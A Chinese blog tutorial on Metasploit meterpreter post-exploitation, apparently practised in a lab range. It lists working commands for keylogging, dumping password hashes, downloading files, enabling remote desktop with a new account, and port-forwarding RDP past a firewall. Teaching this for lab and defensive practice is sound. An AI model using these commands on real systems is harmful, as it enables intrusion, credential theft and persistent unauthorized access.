文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
MSF后渗透知识 文件搜索当我们获取了session,在meterpreter中还可以做哪些 *** 作呢?
sysinfo #查看系统信息 screenshot #屏幕截图 search -d c: -f *.exe #文件搜索
将C盘下面所有的exe文件搜索出来。
pwd #查看当前目录 download C:Userstesthash.txt hash.txt #文件下载 getlwd #查看目标机的当面目录 upload /var/www/msf.php msf.php #文件上传
run post/windows/capture/keylog_recorder #键盘记录
这里就可以将你键盘输入的内容进行记录,当然复制粘贴的无法记录。
在meterpreter里面run 具有很多模块可以进行:
内网发现:
run arp_scanner -r 10.10.10.0/24
同样可以使用命令进入cmd:
shell #命令行 chcp 65001 #修改编码 ,避免乱码格式 arp -a # 内网主机发现HASH导出&进程迁移
hashdump #导出hash ps #查看进程,这里面我们就可以看到都有哪些权限的User运行了哪些进程。 migrate PID号 #迁移进程
从这里我们可以看出这是个域环境。
进程迁移:
开启远程桌面:
run getgui -e #
这里就已经将远程桌面已打开,我们只需利用这个命令创建一个账号,便可登陆:
run getgui -p QWEasd123 -u Long #建立账号,但这样建立账号并没有加入用户组,所以一般使用shell里面去建立。
但如果目标机开启了防火墙,那么就算远程桌面开启的,我们同样无法进行连接:
那我们就需要利用端口转发的技术,来将远程端口给转发出来:
netstat #来查看远程桌面是否开启:这里如果远程端口被修改,我们同样是可以利用命令来进行查看: tasklist /svc | find "TermService" #进入shell,查看远程桌面服务的PID netstat -ano | find "PID号" #利用PID号来查看远程桌面的端口号
将端口转发至本地1234端口:
portfwd add -l 1234 -p 3389 -r 10.10.10.158 #-r 就是填写被攻击机 rdesktop 127.0.0.1:1234 #连接本地1234端口
这样就让被攻击机主动来请求我们的攻击机,从而绕过防火墙限制:
portfwd list #查看添加的条目本地回连
使用本地1234端口成功连接被攻击机远程桌面:
同样可以使用命令进行清除:
portfwd flush #进行清除 help portfwd #这是可以进行查看有哪些命令
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)